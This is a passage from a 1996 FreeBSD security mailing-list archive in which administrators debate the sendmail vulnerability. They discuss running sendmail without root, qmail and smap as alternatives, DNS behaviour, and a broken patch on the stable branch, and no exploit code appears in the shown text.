alpha(3) 7/19/95) To: Adam Shostack , msmith@atrad.adelaide.edu.au (Michael Smith) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 17, 10:35pm, Adam Shostack wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } smap/smapd (from the TIS firewall toolkit) can handle mail delivery } services & binding to port 25. They're designed for security. But they don't do ESMTP, smapd relies on sendmail to forward the mail onto it's next hop, and I think smap/smapd also fell prey to the syslog() hole (though the damage they could potentially do is quite limited). --- Truck From owner-freebsd-security Sun Nov 17 21:06:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA10401 for security-outgoing; Sun, 17 Nov 1996 21:06:12 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA10393 for ; Sun, 17 Nov 1996 21:06:01 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id VAA14699; Sun, 17 Nov 1996 21:05:18 -0800 (PST) From: Don Lewis Message-Id: <199611180505.VAA14699@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 21:05:18 -0800 In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 3:05pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: newton@communica.com.au (Mark Newton), msmith@atrad.adelaide.edu.au (Michael Smith) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 3:05pm, Mark Newton wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Michael Smith wrote: } > but his point is } > valid. In fact, if it were possible to be non-root and bind to port 25, } } That's a wonderful point: The only reason sendmail needs root to bind to } port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP } ports less than 1024 can only be allocated by a privileged user. TCP/IP } implementations on non-UNIX platforms disagree violently with this } assumption, which makes the value of this "security" feature rather dubious. And on those platforms, J. Random user could intercept all incoming mail. Binding a socket to port 23 would be a good way to collect telnet passwords, too ;-) --- Truck From owner-freebsd-security Sun Nov 17 21:11:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA10616 for security-outgoing; Sun, 17 Nov 1996 21:11:52 -0800 (PST) Received: from coven.queeg.com (queeg.com [204.95.70.218]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA10609 for ; Sun, 17 Nov 1996 21:11:30 -0800 (PST) Received: (from brion@localhost) by coven.queeg.com (8.8.3/8.7.3) id VAA08087; Sun, 17 Nov 1996 21:10:50 -0800 (PST) Date: Sun, 17 Nov 1996 21:10:50 -0800 (PST) Message-Id: <199611180510.VAA08087@coven.queeg.com> From: Brion Moss To: "Daniel O'Callaghan" Cc: Mark Newton , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: References: <9611180247.AA15359@communica.com.au> Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Daniel O'Callaghan writes: > On Mon, 18 Nov 1996, Mark Newton wrote: > > Of course, one of the main reasons why sendmail is so "dangerous" is that > > despite fifteen years of it-hurts-when-I-do-this style experience, we *still* > > run it as root! Why do we do this? Why does nobody understand that a UNIX > > process can't just gratuitously gain privileges unless some other privileged > > program gives them away? Given sendmail's history, why do so many people > > still trust it with root privileges when it doesn't actually need them?! > > > > sendmail really only needs root so that it can bind to the "privileged" > > port 25 when it's running in daemon mode. If you frob filesystem permissions > > sufficiently you can get away without providing sendmail with root > > privileges by running it with a non-root uid out of inetd (which is, > > indeed, precisely what I have done with it here at Communica, where > > sendmail runs as the unprivileged "smtp" user). > > I've been thinking about this, too. Why *does* sendmail need to run as root? > a) to bind to port 25 (fixable with inetd, and other ways) > b) to operate on the mail queue (fixable with a group 'mail' or somesuch) > c) to deliver local mail - nope, /usr/libexec/mail.local is suid root to > do this. > > Are there any other reasons? > > Danny Maybe this is a bit too obvious a suggestion, but why not look at the Sendmail Installation and Operation Guide (found in doc/op of the sendmail distribution (try not to laugh when you read the first line): 4.7.1. To suid or not to suid? Sendmail can safely be made setuid to root. At the point where it is about to exec(2) a mailer, it checks to see if the userid is zero; if so, it resets the userid and groupid to a default (set by the u and g options). (This can be overridden by setting the S flag to the mailer for mailers that are trusted and must be called as root.) However, this will cause mail processing to be accounted (using sa(8)) to root rather than to the user send- ing the mail. If you don't make sendmail setuid to root, it will still run but you lose a lot of functionality and a lot of privacy, since you'll have to make the queue directory world readable. You could also make sendmail setuid to some pseudo-user (e.g., create a user called "sendmail" and make sendmail setuid to that) which will fix the privacy problems but not the functionality issues. Also, this isn't a guarantee of security: for example, root occa- sionally sends mail, and the daemon often runs as root. So, with careful thought, we could probably drop that pesky bit... -Brion From owner-freebsd-security Sun Nov 17 21:31:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA11811 for security-outgoing; Sun, 17 Nov 1996 21:31:19 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA11798 for ; Sun, 17 Nov 1996 21:31:10 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id WAA25009; Sun, 17 Nov 1996 22:30:45 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id WAA00963; Sun, 17 Nov 1996 22:30:24 -0700 (MST) Date: Sun, 17 Nov 1996 22:30:19 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: Mark Newton , freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk While agree with what Warner says below, I think Warner would agree that there is no reason that there should not be a fast easy no-brains method of switching to a more secure system, with the accompanying limitations, if so desired. While I don't see things like sendmail and lpd moving out of the base distribution anytime soon, I do think that it would be an excellent idea to let (and encourage; like a big screen in sysinstall letting you go through a menu driven procedure) more secure alternatives be implemented without the admin (who, in many cases, isn't someone who admins Unix for a living) having to do a lot of work. I have a grand scheme for a program that is a frontend to things like: - removing the setuid bit from programs you don't use, and giving you a nice explaination of what the effects are - installing and configuring tcp wrappers - configuring automated logging and notification of important security events; ie. a setup program for something like swatch. - updating your system with recent patches for things like the bazillion holes that have been found in the past, are being found now, and will be found long into the future. - shooting intruders on sight. This would be implemented with either one big program or, more likely, a bunch of little programs with a consistent pretty (ie. sysinstall like, although libdialog is ugly) interface and a parent program that lets you run any of them. Perhaps some day I will get around to trying to make such a program. If someone is too stupid to care at all about security, that's their problem. I think, however, that there are a lot of people out there who do care, but have neither the knowledge or the time to doo a lot about it. On Sun, 17 Nov 1996, Warner Losh wrote: > I'm sorry, but that is not an acceptible answer in a general purpose > OS. What you do on your system is OK, but that is *NOT* a good reason > to remove sendmail from the base OS. People expect the ability to run > whatever they please, or at least a subset selected by the admin. In > order to do that, the mail agent must run as that person. In order to > do that, the mail agent must either run a setuid program that is > accessible to the mail delivery agent (and likely others), or it must > run as root. From owner-freebsd-security Sun Nov 17 21:36:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA12291 for security-outgoing; Sun, 17 Nov 1996 21:36:41 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id VAA12197 for ; Sun, 17 Nov 1996 21:36:07 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPMN0-0003py-00; Sun, 17 Nov 1996 22:35:46 -0700 To: Marc Slemko Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: Mark Newton , freebsd-security@freebsd.org In-reply-to: Your message of "Sun, 17 Nov 1996 22:30:19 MST." References: Date: Sun, 17 Nov 1996 22:35:46 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : While agree with what Warner says below, I think Warner would agree : that there is no reason that there should not be a fast easy : no-brains method of switching to a more secure system, with the : accompanying limitations, if so desired. Agreed. cd /usr/ports/mail/XXXX ; make ; make install should, in an ideal world, be all that is needed. Or something that is that simple to do. : - updating your system with recent patches for things like the : bazillion holes that have been found in the past, are being : found now, and will be found long into the future. :-) Look at the lpr/lpd checkins I've made :-). In fact, if others want, the OpenBSD CVS tree is a weath of patches for those that have the time to wade throught it. : - shooting intruders on sight. Naw. Boiling them in hot oils is much more fun :-). Warner From owner-freebsd-security Sun Nov 17 22:11:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14254 for security-outgoing; Sun, 17 Nov 1996 22:11:48 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14232 for ; Sun, 17 Nov 1996 22:11:14 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13574 for ; Mon, 18 Nov 1996 07:11:03 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08166 for freebsd-security@freebsd.org; Mon, 18 Nov 1996 07:10:47 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23337; Mon, 18 Nov 1996 07:02:55 +0100 (MET) Message-ID: Date: Mon, 18 Nov 1996 07:02:55 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <9611180247.AA15359@communica.com.au> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: ; from Daniel O'Callaghan on Nov 18, 1996 15:18:14 +1100 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Daniel O'Callaghan: > > Are there any other reasons? d) process .forward files as the user. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 22:11:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14259 for security-outgoing; Sun, 17 Nov 1996 22:11:52 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14236 for ; Sun, 17 Nov 1996 22:11:19 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13577 for ; Mon, 18 Nov 1996 07:11:05 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08167 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:47 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23346; Mon, 18 Nov 1996 07:04:18 +0100 (MET) Message-ID: Date: Mon, 18 Nov 1996 07:04:17 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611180225.FAA01413@nagual.ru> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: ; from Marc Slemko on Nov 17, 1996 21:18:29 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Marc Slemko: > Incorrect. Sendmail still attempts a lookup for something, I think it is > the local hostname, for each piece of mail it processes. Last I checked, > this could NOT be disabled without recompiling sendmail. Modifying your > config file or adding a service.switch file does not stop it. No, use FEATURE(nocanonify). Been running with this without DNS for ages. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 22:11:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14269 for security-outgoing; Sun, 17 Nov 1996 22:11:59 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14243 for ; Sun, 17 Nov 1996 22:11:24 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13581 for ; Mon, 18 Nov 1996 07:11:11 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08168 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:47 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id HAA23355; Mon, 18 Nov 1996 07:06:21 +0100 (MET) Message-ID: Date: Mon, 18 Nov 1996 07:06:20 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611180134.RAA14418@salsa.gv.ssi1.com> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: <199611180134.RAA14418@salsa.gv.ssi1.com>; from Don Lewis on Nov 17, 1996 17:34:25 -0800 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Don Lewis: > Qmail doesn't do all the ESMTP negotiation that sendmail does. It keeps > qmail simpler and less likely to be buggy, but not as functional. For > instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX, but > whatever version of qmail I just checked only supports 8BITMIME and > PIPELINING. Sendmail 8.8.x adds ETRN. I don't think it handles 8BITMIME at all even if it announces it. Does it support rewriting from 8bit to 7bit and reverse ? > Sendmail's support of UUCP isn't wonderful (mostly a problem of > getting DNS totally disabled). How well does qmail support UUCP? That's a common misunderstanding. UUCP support in sendmail is pretty good (see my other mail). qmail is BAD for UUCP (and the author doesn't care). -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 22:12:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14286 for security-outgoing; Sun, 17 Nov 1996 22:12:04 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14245 for ; Sun, 17 Nov 1996 22:11:27 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id HAA13585 for ; Mon, 18 Nov 1996 07:11:15 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id HAA08165 for freebsd-security@FreeBSD.ORG; Mon, 18 Nov 1996 07:10:46 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id GAA23325; Mon, 18 Nov 1996 06:59:35 +0100 (MET) Message-ID: Date: Mon, 18 Nov 1996 06:59:34 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> <199611180005.TAA09457@homeport.org> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: <199611180005.TAA09457@homeport.org>; from Adam Shostack on Nov 17, 1996 19:05:45 -0500 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Adam Shostack: > planning to replace sendmail with qmail real soon, and that helps me a > lot. My suggestion was meant to imply the possibility of removing > sendmail from the FreeBSD distribution, and only shipping qmail. I'd strongly object to this. In addition of what Warner said I must add that qmail's UUCP support is noneexitent or rather anti-UUCP in the sense that it generates multiple messages when a mail has multiple recipient. I manage several mailing-lists on my home machine and am the administrator of another one with lots of UUCP users and qmail is unusable. I still can't bear the configuration system of qmail (lots of .qmail-mumble everywhere, user defined mailing-lists that can't be disabled) and the author's attitude in general[1] (but that's another problem). [1] like pretending that sending 300 messages with 1 recipient is smaller than sending 1 mail with 300 recipients by UUCP. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 22:17:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA14700 for security-outgoing; Sun, 17 Nov 1996 22:17:09 -0800 (PST) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA14643; Sun, 17 Nov 1996 22:16:36 -0800 (PST) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.7.5/8.7.3) id WAA05595; Sun, 17 Nov 1996 22:15:47 -0800 (PST) From: "Rodney W. Grimes" Message-Id: <199611180615.WAA05595@GndRsh.aac.dev.com> Subject: Re: New sendmail bug... In-Reply-To: from S at "Nov 17, 96 09:39:11 pm" To: spork@super-g.com (S) Date: Sun, 17 Nov 1996 22:15:46 -0800 (PST) Cc: eric@sendmail.org, igor@alecto.physics.uiuc.edu, roberto@keltia.freenix.fr, freebsd-security@freebsd.org, freebsd-hackers@freebsd.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > But if one does have to run 8.7.6 until they have time to breath, does > anyone know if the error that Igor and I are seeing compiling 8.7.6 from > -stable can be avoided? I first patched with the 2 line setgid, setuid > patch I saw on the list, then I grabbed what was in the current -stable > source and got the same error as Igor. It compiled after deleting the > line in main.c that I saw in the errors, and it seems to work, but > reckless deletion scares me. I wonder what the line was for.... > > Anyhow, any help is appreciated. Someone (who shall remain nameless) has commited a bad patch into the RELENG_2_1_0 branch. What is in there does not compile, I get the exact same error that this person has reported, and this is on a prestine RELENG_2_1_0 compile engine.... this error occured during a ``make world'', so if _vendor_daemon_setup is suppose to be defined someplace else we have a build cycle problem, if sendmail is suppose to have source code for this, someone missed a piece of the patch :-(. PLEASE FIX ASAP, as all -Stable users trying to update via the normal mechanisms to fix the sendmail security problem are going to have builds that blow up in there face. > Thanks, > > Charles > > On Sun, 17 Nov 1996, Eric Allman wrote: > > > This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8; > > 8.7.x is no long supported. > > > > eric > > > > > > ============= In Reply To: =========================================== > > : From: igor@alecto.physics.uiuc.edu (Igor Roshchin) > > : Subject: Re: New sendmail bug... > > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) > > > > : Hello! > > : > > : May be I am missing something, > > : but I was not able to compile the patched version > > : of the sendmail 8.7.6.4, > > : as it appears in FreeBSD distribution (sup.freebsd.org). > > : > > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment > > : *** Error code 1 Yepp... the source tree is muffed up :-(. -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Sun Nov 17 22:56:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA16576 for security-outgoing; Sun, 17 Nov 1996 22:56:26 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA16566 for ; Sun, 17 Nov 1996 22:56:11 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id XAA29013; Sun, 17 Nov 1996 23:55:56 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id XAA01449; Sun, 17 Nov 1996 23:55:34 -0700 (MST) Date: Sun, 17 Nov 1996 23:55:33 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Ollivier Robert cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Incorrect. It RUNS without DNS but still TRIES to use it. If you really don't have IP connectivity, then difference doesn't matter because it still works when the lookup fails, however it still does try and the difference does matter if you have partial IP connectivity. I have a system setup with nocanonify and all the other config file tweaks I know of, and it still tries to use DNS as a tcpdump shows quite clearly. This system is running 8.7.5, so things may have been changed in more recent versions but I can't say for sure; if this has changed in more recent versions, please let me know. I _think_ the define that needs to be set to 0 is NAMED_BIND, but don't recall for sure. This has been gone over before on the lists. Any more followups I make to this will go to -hackers. On Mon, 18 Nov 1996, Ollivier Robert wrote: > According to Marc Slemko: > > Incorrect. Sendmail still attempts a lookup for something, I think it is > > the local hostname, for each piece of mail it processes.. Last I checked, > > this could NOT be disabled without recompiling sendmail. Modifying your > > config file or adding a service.switch file does not stop it. > > No, use FEATURE(nocanonify). Been running with this without DNS for ages. > > -- > Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 > From owner-freebsd-security Sun Nov 17 23:16:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA17695 for security-outgoing; Sun, 17 Nov 1996 23:16:08 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA17660; Sun, 17 Nov 1996 23:15:42 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14836; Sun, 17 Nov 1996 23:15:12 -0800 (PST) From: Don Lewis Message-Id: <199611180715.XAA14836@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 23:15:12 -0800 In-Reply-To: "S(pork)" "Re: New sendmail bug..." (Nov 17, 9:39pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: "S(pork)" , Eric Allman Subject: Re: New sendmail bug... Cc: Igor Roshchin , Ollivier Robert , freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Nov 17, 9:39pm, "S(pork)" wrote: } Subject: Re: New sendmail bug... } But if one does have to run 8.7.6 until they have time to breath, does } anyone know if the error that Igor and I are seeing compiling 8.7.6 from } -stable can be avoided? I first patched with the 2 line setgid, setuid } patch I saw on the list, then I grabbed what was in the current -stable } source and got the same error as Igor. It compiled after deleting the } line in main.c that I saw in the errors, and it seems to work, but } reckless deletion scares me. I wonder what the line was for.... } > : > + vendor_daemon_setup(CurEnv); It appears to be some sort of hook that only ConvexOS currently uses. >From conf.c in 8.8.3: /* ** VENDOR_DAEMON_SETUP -- special vendor setup needed for daemon mode */ void vendor_daemon_setup(e) ENVELOPE *e; { #if SECUREWARE if (getluid() != -1) { usrerr("Daemon cannot have LUID"); exit(EX_USAGE); } #endif /* SECUREWARE */ } --- Truck From owner-freebsd-security Sun Nov 17 23:31:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA18718 for security-outgoing; Sun, 17 Nov 1996 23:31:41 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA18700; Sun, 17 Nov 1996 23:31:17 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09174; Mon, 18 Nov 1996 08:30:43 +0100 (MET) To: Michael Smith cc: imp@village.org (Warner Losh), newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 14:05:04 +1030." <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> Date: Mon, 18 Nov 1996 08:30:43 +0100 Message-ID: <9172.848302243@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In message <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>, Michael Smith writes: >Warner Losh stands accused of saying: >> >> I don't buy this. You need to be able to create a mailbox of an >> arbitrary user, and then write to that mailbox with that user's uid, >> or to a shell of that user's uid. To do otherwise would introduce >> other security problems, some of which have been beat to death in the >> freebsd lists. >> >> What am I missing? > >mail.local. > >Mark's sense of warmth is perhaps slightly over-smug, but his point is >valid. In fact, if it were possible to be non-root and bind to port 25, >then sendmail could be run non-root in daemon mode and not be called from >cron (which Mark omitted to mention). What we REALLY need, is a way for root, to hand out certain priviledges. Imagine this: sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` This means that users with UID smtp can bind to socket 25 (aka smtp), and so on. Now sendmail NEVER needs to be root. How's that for security ? -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Sun Nov 17 23:33:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA18912 for security-outgoing; Sun, 17 Nov 1996 23:33:22 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA18897 for ; Sun, 17 Nov 1996 23:33:04 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14862; Sun, 17 Nov 1996 23:31:33 -0800 (PST) From: Don Lewis Message-Id: <199611180731.XAA14862@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 23:31:33 -0800 In-Reply-To: Marc Slemko "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 10:30pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Marc Slemko , Warner Losh Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: Mark Newton , freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 17, 10:30pm, Marc Slemko wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } I have a grand scheme for a program that is a frontend to things like: } - removing the setuid bit from programs you don't use, and } giving you a nice explaination of what the effects are I'd like to be able to do "make release" to get a binary release with this already taken care of to make installation easier. I'd also like the release to have unnecessary stuff like compilers and include files removed. --- Truck From owner-freebsd-security Sun Nov 17 23:38:00 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA19379 for security-outgoing; Sun, 17 Nov 1996 23:38:00 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA19350; Sun, 17 Nov 1996 23:37:22 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09224; Mon, 18 Nov 1996 08:37:34 +0100 (MET) To: newton@communica.com.au (Mark Newton) cc: msmith@atrad.adelaide.edu.au (Michael Smith), imp@village.org, batie@agora.rdrop.com, adam@homeport.org, 